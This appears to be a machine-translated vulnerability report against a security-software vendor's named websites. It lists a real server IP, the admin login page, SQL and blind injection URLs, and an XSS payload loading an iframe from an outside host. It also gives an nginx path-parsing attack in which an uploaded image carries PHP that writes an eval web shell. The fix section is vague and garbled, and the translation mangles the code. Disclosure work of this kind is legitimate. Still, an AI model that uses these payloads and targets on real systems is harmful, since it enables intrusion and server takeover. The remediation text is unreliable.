Security Manager website injection + nginx misconfiguration vulnerability and repair

Brief description:
 
Improper configuration of multiple injection + nginx, direct getshell
Detailed description:
 
117.135.130.111-[5]-nginx/0.9.3
Http://bbs.anguanjia.com
Http://bbs.aqgj.cn
Http://wap.anguanjia.com
Http://www.anguanjia.com
Http://www.anquanguanjia.com
 
Background
Http://www.aqgj.cn/admin/login.htm
 
Official Website Injection
Http://www.aqgj.cn/job_content.php? Id = 15
Http://www.aqgj.cn/plug/search_cont.php? Id = 19
 
Blind Injection
Http://www.aqgj.cn/countfriendlink.php? Id = 58 & link =
 
Search for reflected xss (which can be ignored by the way)
Http://www.aqgj.cn/plug/search.php? Key = % 3 Ciframe % 20 width = 800px % 20 height = 600px % 20src = http://gesong.org % 20% 3E % 3C/iframe % 3E
 
N injections on the WAP page
Http://m.aqgj.cn/wap? A = info & id = 75 & m = Soft & t = x
Http://m.aqgj.cn/wap? A = down & id = 254 & m = Soft & softid = 75 & t = x
Http://m.aqgj.cn/wap? M = Soft & stid = 5 & t = x
 
PATH (inevitably, php fault tolerance can be disabled)
Http://bbs.aqgj.cn/uc_server/control/admin/db.php
-/Data/nginx/html/bbs/uc_server/control/admin/db. php
 
There is also an improper nginx configuration (all on the same server, and it's all done)
Http://bbs.aqgj.cn/static/image/common/logo.png/.php
Upload any image and insert php code
<? PHP fputs (fopen ('x. php', 'w'), '<? Php eval ($ _ POST [x])?> ');?>
Then access the image/. php and directly getshell
Proof of vulnerability:

Http://www.aqgj.cn/test.txt
 
 
 
 


 
Solution:
 
 
The background has potential, revealing how dangerous it is.
Nginx configuration refer to: http://www.bkjia.com/Article/201005/47604.html

As for the injection of Shenma, you know.
Copyright Disclaimer: reprinted, please indicate the source of praise